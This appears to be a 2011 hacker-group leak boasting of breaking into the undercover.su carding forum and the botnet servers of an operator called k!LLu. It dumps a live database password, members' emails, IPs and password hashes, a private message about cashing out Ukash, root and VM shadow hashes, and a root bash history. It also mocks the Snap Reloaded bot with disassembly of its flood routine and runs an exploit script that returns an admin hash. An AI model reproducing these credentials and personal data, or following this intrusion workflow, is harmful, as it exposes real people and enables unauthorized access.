SpyEye.Builder.v1.2.99.zip -rw-r--r-- 1 root www 320512 Jun 6 20:45 back.exe -rw-r--r-- 1 root www 118784 Jun 6 14:22 backs.exe -rw-r--r-- 1 root www 4538223 Jun 6 14:45 backspace.rar -rw-r--r-- 1 root www 7168 May 11 13:26 elite_4.2.exe drwxr-xr-x 3 ucsu www 512 Sep 29 18:50 files -rw-r--r-- 1 ucsu www 408 Feb 6 2011 ico.png -rw-r--r-- 1 ucsu www 1053 Feb 6 2011 icon_icq.png -rw-r--r-- 1 ucsu www 536 Aug 21 15:59 index.php -rw-r--r-- 1 root www 515 May 4 10:00 index.php_ -rw-r--r-- 1 ucsu www 162 Feb 6 2011 index_.html drwxr-xr-x 12 ucsu www 512 Sep 27 12:59 ipb3 drwxr-xr-x 2 root www 512 May 4 09:58 ipboard drwxr-xr-x 21 root www 1024 Apr 16 16:07 ipboard___beta -rw-r--r-- 1 ucsu www 25474 Feb 6 2011 logo.jpg -rw-r--r-- 1 ucsu www 4657 Feb 6 2011 logo.png -rw-r--r-- 1 root www 44909 May 4 09:53 mainlogo.png drwxr-xr-x 2 root www 512 Jun 6 14:31 private -rw-r--r-- 1 root www 253952 May 5 16:32 snap.exe drwxr-xr-x 3 root www 512 Aug 14 22:01 snapshot -rw-r--r-- 1 root www 118784 Jun 6 14:39 stansecu.exe drwxr-xr-x 3 root www 512 May 4 11:15 static -rw-r--r-- 1 ucsu www 107003 Sep 16 16:20 test.rar -rw-r--r-- 1 root www 118784 May 18 19:35 v2.exe -rw-r--r-- 1 root www 118784 May 18 19:35 v3.exe # cd private # ls -la total 8908 drwxr-xr-x 2 root www 512 Jun 6 14:31 . drwxrwx--- 10 ucsu www 1024 Oct 8 17:04 .. -rw-r--r-- 1 root www 4538210 Jun 6 14:32 backspace.rar -rw-r--r-- 1 root www 44 Jun 6 13:23 index.php # cat index.php Certificate not found. -- Access prohibited Alright, before we continue, lets have a look at some of k!LLu's enhancements he stated after Undercover.su left its beta status: ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | k!LLu: Fassen wir kurz zusammen, unsere Datenbank enthält nun | | keine IP Adressen mehr, es ist nahezu unmöglich | | IP-Adressen mitzuloggen, die Passwörter sind "uncrackbar" | | gespeichert. Alle Beiträge, E-Mail's, Themen und PM's | | sind unlesbar verschluesselt. Selbst ein Hack wäre nun | | völlig egal und sinnfrei! | |____________________________________________________________________| As we can see, it clearly should not be possible to take any advantage of hacking undercover.su because of its highly encrypted database. # grep ucsu /var/log/proftpd-transfer.log | tail Thu Sep 29 16:57:38 2011 0 77.20.18.64 1994 /home/ucsu/undercover.su/ipb3/public/style_css/css_8/calendar_select.css a _ o r ucsu ftp 0 * c Thu Sep 29 16:59:00 2011 0 77.20.18.64 79303 /home/ucsu/undercover.su/ipb3/public/style_css/ipb_styles.css a _ i r ucsu ftp 0 * c Thu Sep 29 17:03:42 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c Thu Sep 29 17:07:28 2011 0 77.20.18.64 34809 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c Thu Sep 29 17:08:43 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c Thu Sep 29 17:08:59 2011 0 77.20.18.64 33154 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg a _ d r ucsu ftp 0 * c Thu Sep 29 17:13:31 2011 0 77.20.18.64 41797 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c Thu Sep 29 17:17:35 2011 0 77.20.18.64 59481 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c Thu Sep 29 17:19:14 2011 1 77.20.18.64 93766 /home/ucsu/undercover.su/ipb3/public/style_images/animate/banner_bg.jpg b _ i r ucsu ftp 0 * c Thu Sep 29 18:49:59 2011 1 77.20.18.64 160997 /home/ucsu/undercover.su/files/design.PNG b _ i r ucsu ftp 0 * c Seems like undercover.su/ipb3 is the latest version of k!LLu's project # cd ipb3 # cat conf_global.php # mysql -u ucsu_ipb ucsu_ipb -p712987asdxyas Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 465217 Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89 Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> SELECT member_id, name, email, ip_address, members_pass_hash, members_pass_salt FROM ucsec_members LIMIT 10; +-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ | member_id | name | email | ip_address | members_pass_hash | members_pass_salt | +-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ | 1 | s1mpl3x | purplera1n@safe-mail.net | 77.20.18.64 | 517cc224929adfa4906328f1ae42bf22 | !4w3= | | 2 | medi8tor | ace1992@gmx.net | | 4f6f0b6261c8363a71b6fdfdc037610d | J-|`H | | 3 | usrid3 | usrid3@undercover.su | | 058089135cfab52cc9d1ba6ef32ea202 | 0]qxI | | 4 | usrid4 | usrid4@undercover.su | | f29637821bb0e05a55dc8ebf9e24e06f | #}(TJ | | 5 | test | test@mail.de | | 0bb5a87636ebda286ceea9494d48dc12 | 9N2t, | | 6 | Man4ic | mrajabi@hotmail.de | | f0a77e175ea95c9b24e2e24eba27c51b | Q}lRm | | 7 | bin | binary@secure-mail.biz | | 8ae8499691d35b04442a6ba87a92a9fa | JM;3! | | 8 | Ixde | angela.krueger@hotmail.de | | 5b7eee531e99f89be45ff928d7e045ab | qfi7X | | 9 | casy | 76671253@trash-mail.com | | abddc59b20ad591d10b47b02bd70d426 | 4G:(s | | 10 | soldier16 | musekeule@yahoo.de | | 1079fe12b4d9e3429c8975920c79a161 | *Y$cj | +-----------+-----------+---------------------------+-------------+----------------------------------+-------------------+ 10 rows in set (0.00 sec) mysql> SELECT msg_post, msg_ip_address FROM ucsec_message_posts WHERE msg_author_id = 1 LIMIT 1; +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ | msg_post | msg_ip_address | +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ | Meld dich ICQ 83885,
wenn dein Tut haelt was es verspricht kann ich dir auch gerne ne Menge in Bar zukommen lassen -- je nachdem wieviel im Shop ist,
kann 15k Ukash daily nahezu Instant auscashen | 7 | +---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------+ 1 row in set (0.00 sec) mysql> Ctrl-C -- exit! Aborted # WHAT THE FUCK IS THIS GUY TALKING ABOUT?!@# It's driving us insane, because we thought that hacking Undercover.su would be at least a bit, a _BIT_, of a challenge. But fucking NO! k!LLu is by far the dumbest person to be ever slapattacked by us. That's why we were not satisfied with the simple ownage of Undercover.su and headed over to his other projects ... ,;~;, _/\ \ ) (\\ ()) /';;,, // | -------====={ k!LLu's Botnet }========))))))))))))))=m( )_ __ | ,(.' '~/()' ' '\ We could now tell you a story about love and ~ | ||( );, romance, about people dying and fighting as ( ,;.)-\ / ';, heroes, about people suffering and crying. But \ ( \ ( instead, we now shall tell you the story of how || \\ we raped k!LLu and his little botnet to hell and /_( /_( back. So here it is: . / \ _\ /_ . . (,'v`.) . . \) ( ) ,' `. ( ) (/ \`. / `-' `-' \ ,'/ : ' _______ ' : | _,-' ,-. `-._ | |,' ( )__`-'__( ) `.| (|,-,'-._ _.-`.-.|) / /<(o )> <(o )>\ \ : : | | : : | | ; : | | ------ k!LLu, thou shall | | (.-.) | | officially be owned | | ,' ___ `. | | to fuck. ; |)/ ,'---'. \(| : _,-/ |/\( )/\| \-._ _..--'.-( | `-'''-' | )-.`--.._ `. ;`._________,': ,' ,' `/ \'`. `------.------' One thing that has always been connected to k!LLu was the botnet he kept bragging about. It probably all started back at crimenetwork when he ddosed competitors to at least get some visitors. Knowing k!LLu, one would think his botnet was just imaginary like most of the other things he rambles about. But no, k!LLu actually had a botnet for which he used his own botsoftware "Snap Reloaded". Unsurprisingly, this piece of malware is just as bad as most of the other things he has been working on. If you don't find at least two pre-auth vulnerabilities within a minute of looking at the panel's source you must be seriously retarded and it was accordingly easy to break into his boxes. k!LLu hosts more than one panel most of which are run from separate VMs and probably belong to some of his customers. In fact everyone who's hosting their net on k!llu's server is actually donating bots to k!LLu. He is a master of advertising but unfortunately, he doesn't take telling the truth too seriously. That's why we'll take a look into the "Snap Reloaded" bot he is selling. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | [+] User-Mode (ring3) r00tkit | | -> [+] run's as a service and hide himself | | -> [+] hides&protect root process | | -> [+] hides&protect files | | -> [+] hides root processes | | -> [+] hides used local&remote TCP Port(s) <- thx to jeffosz | | -> [+] hides used local&remote UDP Port(s) <- thx to jeffosz | | -> [+] hides used regkey''s | |____________________________________________________________________| You don't think k!LLu'd be shameless enough to _invent_ a feature? He did. Well, at least not a single binary we could get our hands on showed any signs of a rootkit. A 3-year-old would be able to kill the process and kick that piece of shit into the trashcan. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | [+] METAMORPHIC architecture | | -> [+] use random legit process,file & service names | | -> [+] generate a unique stub every run | | -> [+] whole software gets metamorph virtualized byte per byte | |____________________________________________________________________| Again, a hardcoded list of processnames, that aren't at all "legit" is not that cool. And, unsurprisingly, the bot isn't virtualized. But hey, he used UPX, we give him that. ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | [+] webpanel developped with dreamweaver cs5 and own ajax | | framework using mysql and php | | -- no ressource wasting jquery/extJS shit like kerber0s, | | EliteLoader | | [+] multi theme support | | [+] multi command support => every victim can do as many threads | | as you want | | [+] reliable protocoll which creates the lowest possible server | | load | | [+] modularized structure | | [+] Blocks common Trackers | | [+] dynamic ConnectionDelay => if server load raises, delay | | raises and you are able to host over 25000Victims on a little | | VPS | |____________________________________________________________________| The next thing on the list is the webpanel. It's partially ioncube encoded but still runs perfectly without even changing anything. As said above, it's also pretty straight forward to find several vulns in it. But wait: ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | [+] XSS/SQLi Prevention Firewall | |____________________________________________________________________| And we really gotta say: this thing is the shit. Well, of course it doesn't exist but who'd bother and check anyways? $ ./killu_u_r_lame.pl bgate.secure-host.in bl1ng bl1ng! admin:76a2173be6393254e72ffa4d6df1030a $ ____________________________________________________________________ | __ __ | | .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | | | _ | | | _ || _| -__|| _ | _ |_ _| | | |__ |_____|_____||____|_____||_____|_____|__.__| | |________|__|________________________________________________________| | | | Another interessting thing is, thats is the WORLDS FIRST BOT | | which patches tcpip.sys/tcpstack on ALL WIN-OS(including Win8) | | via DCI and Windows-own Testsigning Mode | | This allows us again to use half-open connections and rawSockets! | | and grant us to use things like IP Spoofing or REAL SYNFLOOD ! | | | | This is the really awesome part, of this state-of-the-Art Botnet | | software! DDoS Class is written in pure (m)ASM to get the maximum | | possible stability and maximum possible Attack-strength/Power. | | Everyone who says his Bot is stronger, LIES | | There's NO WAY to get DDoS stronger! | |____________________________________________________________________| Wow, k!LLu talking about people lying, somewhat ironic. Let's have a look at this badass functions of his. [...] movzx eax, byte ptr [ebp+14] ; | mov dword ptr [ebp-C], ebx ; | mov dword ptr [ebp-8], esi ; | mov esi, dword ptr [ebp+8] ; | mov byte ptr [ebp-11], al ; | xor eax, eax ; | mov dword ptr [ebp-4], edi ; | mov edi, dword ptr [ebp+C] ; | movsx ebx, word ptr [ebp+10] ; | mov dword ptr [esp+8], eax ; | mov eax, 1 ; | mov dword ptr [esp+4], eax ; | mov dword ptr [esp], 2 ; | call near dword ptr [41E0E8] ; \socket mov dword ptr [esi+190], eax sub esp, 0C inc eax ; | je 004029E6 ; | movzx eax, bx ; | mov dword ptr [esp], eax ; | call near dword ptr [41E0E0] ; \ntohs mov ecx, 2 mov word ptr [esi+194], cx sub esp, 4 mov word ptr [esi+196], ax ; | mov eax, dword ptr [edi] ; | mov dword ptr [esp], eax ; | call near dword ptr [41E0E4] ; \inet_addr sub esp, 4 inc eax ; | je 00402A10 ; | mov eax, dword ptr [edi] ; | mov dword ptr [esp], eax ; | call near dword ptr [41E0E4] ; \inet_addr sub esp, 4 mov dword ptr [esi+198], eax cmp byte ptr [ebp-11], 0 jnz 00402A02 mov dword ptr [ebp-10], 1 lea eax, dword ptr [ebp-10] ; | mov dword ptr [esp+8], eax ; | mov eax, 8004667E ; | mov dword ptr [esp+4], eax ; | mov eax, dword ptr [esi+190] ; | mov dword ptr [esp], eax ; | call near dword ptr [41E0A8] ; \ioctlsocket mov eax, 10 sub esp, 0C mov dword ptr [esp+8], eax ; | lea eax, dword ptr [esi+194] ; | mov dword ptr [esp+4], eax ; | mov eax, dword ptr [esi+190] ; | mov dword ptr [esp], eax ; | call near dword ptr [41E0D8] ; \connect [...] This is an excerpt from his "synflood" function. It's obvious that creating a new sockaddr structure for every time you call connect is not efficient at all. He also seems to think setting a socket to non-blocking mode via ioctlsocket would make his simple tcp flood look like a synflood. But let's look at the code that calls this from within the ddos thread and quickly reveals that this is compiler generated rather than "plain assembly". push ebp mov ebp, esp [...] mov eax, dword ptr [41E06C] ; ||| mov eax, dword ptr [eax+14] ; ||| mov dword ptr [esp], eax ; ||| call ; ||\atoi mov dword ptr [ebp-70], eax ; || mov eax, dword ptr [41E06C] ; || mov eax, dword ptr [eax+C] ; || mov dword ptr [esp], eax ; || call ; |\atoi mov dword ptr [ebp-74], eax ; | mov eax, dword ptr [41E06C] ; | mov eax, dword ptr [eax+8] ; | mov dword ptr [esp], eax ; | call ; \atoi [...] mov esi, esi ; plain asm in the hewd [...] mov dword ptr [esp], 0 ; | call ; \ExitThread [...] But don't be too sad, k!LLu. We got some exciting news for you: userspace ddos code is not the bottleneck. You're probably trying to get your bots back after we rmd your box but we're afraid we were able to clean a majority of them up. # uname -a Linux link.cyberhost.kz 2.6.18-238.9.1.el5.028stab089.1PAE #1 SMP Thu Apr 14 14:38:02 MSD 2011 i686 athlon i386 GNU/Linux # id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) # cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin lxlabs:x:500:500::/home/lxlabs:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash truevm:x:503:503:System User for 130:/home/truevm:/usr/bin/lxopenvz stansecuvm:x:504:504:System User for 140:/home/stansecuvm:/usr/bin/lxopenvz bnetvm:x:506:506:System User for 160:/home/bnetvm:/usr/bin/lxopenvz scriptstvm:x:508:508:System User for 180:/home/scriptstvm:/usr/bin/lxopenvz spikevm:x:514:514:System User for 240:/home/spikevm:/usr/bin/lxopenvz xtothecvm:x:515:515:System User for 250:/home/xtothecvm:/usr/bin/lxopenvz y00vm:x:516:516:System User for 260:/home/y00vm:/usr/bin/lxopenvz iodasvm:x:517:517:System User for 270:/home/iodasvm:/usr/bin/lxopenvz rootvm:x:520:520:System User for 300:/home/rootvm:/usr/bin/lxopenvz stansocksvm:x:521:521:System User for 310:/home/stansocksvm:/usr/bin/lxopenvz bdgatevm:x:524:524:System User for 340:/home/bdgatevm:/usr/bin/lxopenvz fredvm:x:525:525:System User for 350:/home/fredvm:/usr/bin/lxopenvz spike80vm:x:526:526:System User for 360:/home/spike80vm:/usr/bin/lxopenvz ixdevm:x:527:527:System User for 370:/home/ixdevm:/usr/bin/lxopenvz wohovm:x:528:528:System User for 380:/home/wohovm:/usr/bin/lxopenvz sethvm:x:529:529:System User for 390:/home/sethvm:/usr/bin/lxopenvz # cat /etc/shadow root:$1$v.vPGI.9$s9ss0TBUPqOe9X3ufPT4W1:15105:0:99999:7::: bin:*:15105:0:99999:7::: daemon:*:15105:0:99999:7::: adm:*:15105:0:99999:7::: lp:*:15105:0:99999:7::: sync:*:15105:0:99999:7::: shutdown:*:15105:0:99999:7::: halt:*:15105:0:99999:7::: mail:*:15105:0:99999:7::: news:*:15105:0:99999:7::: uucp:*:15105:0:99999:7::: operator:*:15105:0:99999:7::: games:*:15105:0:99999:7::: gopher:*:15105:0:99999:7::: ftp:*:15105:0:99999:7::: nobody:*:15105:0:99999:7::: nscd:!!:15105:0:99999:7::: vcsa:!!:15105:0:99999:7::: rpc:!!:15105:0:99999:7::: mailnull:!!:15105:0:99999:7::: smmsp:!!:15105:0:99999:7::: pcap:!!:15105:0:99999:7::: dbus:!!:15105:0:99999:7::: haldaemon:!!:15105:0:99999:7::: avahi:!!:15105:0:99999:7::: sshd:!!:15105:0:99999:7::: avahi-autoipd:!!:15105:0:99999:7::: rpcuser:!!:15105:0:99999:7::: nfsnobody:!!:15105:0:99999:7::: apache:!!:15106:::::: lxlabs:!!:15106:0:99999:7::: mysql:!!:15106:::::: truevm:$1$Cp/eTTFF$nqVR5/rgSvqs51UIuz6Et.:15251:0:99999:7::: stansecuvm:$1$o3WpZh6S$mPXWzQjMEL5zIkwBFhGGD1:15112:0:99999:7::: bnetvm:$1$V.AhGgm3$o4ZdgfznQ3sE2.1KJa0qx/:15115:0:99999:7::: scriptstvm:$1$W5AWFCAH$dbJijEizlB92aFTY7HCDX.:15116:0:99999:7::: spikevm:$1$m1v5zxhw$xs3WszkyroI/FWi8djdo4.:15132:0:99999:7::: xtothecvm:$1$D9ZLxI1c$Sopa3HPCOBTRC4c6KBtCD/:15134:0:99999:7::: y00vm:$1$k1GqAtHB$mdsd292s..nL/v6YG5Tfz0:15138:0:99999:7::: iodasvm:$1$6laui1W/$L/evF8MACUrrJ.AUbBC2E.:15138:0:99999:7::: rootvm:$1$0rDTGCQP$1OK0z1ldsptZuWD9YJmfM.:15201:0:99999:7::: stansocksvm:$1$KbcEDmUM$Idr7lpMI/JOYU0pY3uafF/:15201:0:99999:7::: bdgatevm:$1$0TIPnn9P$.IoVhoG0DYMW0gUfzUqnH/:15208:0:99999:7::: fredvm:$1$QKXpFmyk$tNA8I7G6ZCc5eKbuHyHTr/:15222:0:99999:7::: spike80vm:$1$Ir2OIga1$Xfp.9xdaXFWaaxc18Q/hR/:15224:0:99999:7::: ixdevm:$1$xK6jSstU$cOuss77pdmE6YfUmBL2pa1:15226:0:99999:7::: wohovm:$1$SRfLhbuK$gz/o3IYB/WJdHKGPhll6z0:15233:0:99999:7::: sethvm:$1$aal3q4fB$bf2DeWIqbsZ/IVjBGhepv0:15250:0:99999:7::: # pwd /root # alias ls="ls -la" # ls total 341288 drwxr-x--- 4 root root 4096 Oct 9 08:20 . drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. -rw------- 1 root root 6069 Oct 9 08:37 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwxr-xr-x 16 root root 4096 May 10 2009 .etc -rw------- 1 root root 41 Oct 9 07:59 .lesshst -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc -rw-r--r-- 1 root root 134392688 May 12 02:28 1000mb.bin -rw-r--r-- 1 root root 135565568 May 12 05:16 1000mb.bin.1 -rw-r--r-- 1 root root 30797000 May 12 02:23 100mb.test -rw-r--r-- 1 root root 48135408 May 12 02:55 100mb.test.1 -rw------- 1 root root 1171 May 11 09:46 anaconda-ks.cfg -rw-r--r-- 1 root root 719 May 12 01:03 hypervm-install-master.sh -rw-r--r-- 1 root root 14502 May 11 09:46 install.log -rw-r--r-- 1 root root 2886 May 11 09:46 install.log.syslog drwxr-xr-x 7 root root 4096 May 12 01:04 program-install -rw-r--r-- 1 root root 68091 Jun 4 2009 program-install.zip # cat .bash_history yum install openssh-server net-snmp nano /etc/snmp/snmpd.conf /etc/init.d/snmpd restart exit top setenforce 0 wget http://download.lxcenter.org/download/hypervm/production/hypervm-install-master.sh sh ./hypervm-install-master.sh --virtualization-type=xen/openvz/NON sh ./hypervm-install-master.sh --virtualization-type=openvz nano /etc/grub.conf shutdown -r now wget http://mirror.leaseweb.com/speedtest/1000mb.bin top service hypervm service hypervm start yum install iptraf iptraf nano /etc/resolv.conf nano /etc/resolv.conf ifconfig tracert tracert 193.107.16.183 193.107.16.82 tracert 193.107.16.183 wget http://cachefly.cachefly.net/100mb.test wget http://cachefly.cacwget http://cachefly.cachefly.net/100mb.testhefly.net/100mb.test get http://cachefly.cachefly.net/1000mb.test wget http://cachefly.cachefly.net/1000mb.test wget http://cachefly.cachefly.net/100mb.test wget http://mirror.leaseweb.com/speedtest/1000mb.bin lsmod |grep -i ipt_conntrack /sbin/modprobe ipt_owner /sbin/modprobe ipt_recent /sbin/modprobe ipt_tos /sbin/modprobe ipt_TOS /sbin/modprobe ipt_LOG /sbin/modprobe ip_conntrack /sbin/modprobe ipt_limit /sbin/modprobe ipt_multiport /sbin/modprobe iptable_filter /sbin/modprobe iptable_mangle /sbin/modprobe iptable_TCPMSS /sbin/modprobe iptable_tcpmss /sbin/modprobe ipt_tcpmss /sbin/modprobe ipt_ttl /sbin/modprobe ipt_length /sbin/modprobe ipt_state /sbin/modprobe ipt_nat /sbin/modprobe ip_nat_ftp nano /etc/sysconfig/iptables-config nano /etc/sysconfig/vz service iptables restart service vz start service vz stop service iptables restart service vz start iptables -A INPUT -p tcp --dport 80 -j DROP iptables -A INPUT -p tcp --dport 3306 -j DROP ping www.besthotshop.info ping www.ddstores.com modprobe ipt_limit nano /etc/sysconfig/iptables-config nano /etc/sysconfig/vz iptables restart /etc/init.d/iptables restart vzctl set 110 --iptables "ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save save -- save vzctl set 110 --iptables iptable_nat --save vzctl stop 110 vzctl set 110 --iptables iptable_nat --save vzctl set 110 --iptables iptable_nat ipt_limit --save vzctl set 110 --iptables ipt_limit --save vzctl restart 110 vzctl stop 110 nano /etc/sysconfig/vz service vz restart vzctl set 110 --numiptent 2000 --save vzctl stop 110 vzctl set 110 --iptables vzctl set 110 --iptables ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp --save vzctl set 110 --iptables vzctl set 110 --iptables -h vzctl set 110 -h vzctl set 110 --help modprobe ipt_limit ipt_REJECT ipt_tos ipt_TOS ipt_LOG ip_conntrack ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_l iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 -j DROP iptables --flush service vz restart iptables -A INPUT -p tcp --dport 80 -m connlimit --connlimit-above 8 -j DROP sdasdasdasd modprobe ipt_connlimit nano /etc/sysconfig/vz nano /etc/sysconfig/iptables-config /etc/init.d/iptables restart service vz restart shutdown -r now service vz restart lsmod | grep ipt modprobe -v xt_connlimit echo 2262144 > /proc/sys/net/ipv4/ip_conntrack_max echo 22262144 > /proc/sys/net/ipv4/ip_conntrack_max dmeg dmesg iptables --flush service iptables restart iptraf modprobe xt_state sysctl net.ipv4.netfilter.ip_conntrack_max wc -l /proc/net/ip_conntrack sysctl - sysctl -po sysctl -p nano /etc/sysctl.conf sysctl -p nano /etc/sysctl.conf sysctl -p sysctl -p | grep mem sysctl -p | grep mem yum install htop system-config-network ifconfig ping 193.107.17.66 ping 193.107.17.67 iptables --flush ping 193.107.17.80 sysctl -p | grep mem ping 193.107.17.66 ping 193.107.17.80 nano /etc/sysctl.conf service network restart ip route ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 service network restart service network restart ip route ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 ip route ip route add 193.107.17.80 dev venet0 scope link ip route add 193.107.17.66 dev venet0 scope link nano /etc/sysctl.conf service sysctl restart sysctl -p sysctl -a ip route ip route add 193.107.17.66 dev eth0 scope link ip route add 193.107.17.67 dev eth0 scope link ip rute ip route service network restart ifup-local ip route ip route add 193.107.17.0/24 dev eth0 route add 193.107.17.0/24 netmask 255.255.255.0 dev eth1 ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.1 ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.66 ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.16.82 route redhat-config-network network-admin route add default2 gw 193.107.17.1 eth0 route add default gw 193.107.17.1 eth0 route service httpd stop route add default gw 193.107.17.1 eth0 route add default2 gw 193.107.17.1 eth0 ip route add 193.107.17.0/24 dev eth0 proto kernel scope link src 193.107.17.68 ip route add 193.107.17.0/24 dev eth0 ifconfig route add default gw 193.107.17.1 eth0 ip route add 193.107.17.0/24 dev eth0 service network restart ip route add 193.107.17.0/24 dev eth0 route add default gw 193.107.17.1 eth0 ip route add 193.107.17.0/24 dev venet0 netstat paswd passwd modprobe tun vzctl set 310 --devices c:10:200:rw --save vzctl set 310 --capability net_admin:on --save modprobe ipt_mark modprobe ipt_MARK modprobe tun vzctl stop 310 vzctl set 310 --capability net_admin:on --save vzctl set 310 --devices c:10:200:rw --save vzctl start 310 vzctl exec 310 mkdir -p /dev/net vzctl exec 310 mknod /dev/net/tun c 10 200 vzctl exec 310 chmod 600 /dev/net/tun df top su bnetvm iptables -A INPUT -p tcp --destination-port 80 -j DROP top hitop htop ftop iftop netstat # ifconfig eth0 Link encap:Ethernet HWaddr E0:CB:4E:4F:A7:D8 inet addr:193.107.16.82 Bcast:193.107.16.255 Mask:255.255.255.0 inet6 addr: fe80::e2cb:4eff:fe4f:a7d8/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3764684 errors:0 dropped:0 overruns:0 frame:0 TX packets:2963185 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:517778892 (493.7 MiB) TX bytes:429952789 (410.0 MiB) Interrupt:90 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:3830 errors:0 dropped:0 overruns:0 frame:0 TX packets:3830 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:257453 (251.4 KiB) TX bytes:257453 (251.4 KiB) venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 RX packets:2952095 errors:0 dropped:0 overruns:0 frame:0 TX packets:3188473 errors:0 dropped:313 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:387733783 (369.7 MiB) TX bytes:408435813 (389.5 MiB) # netstat 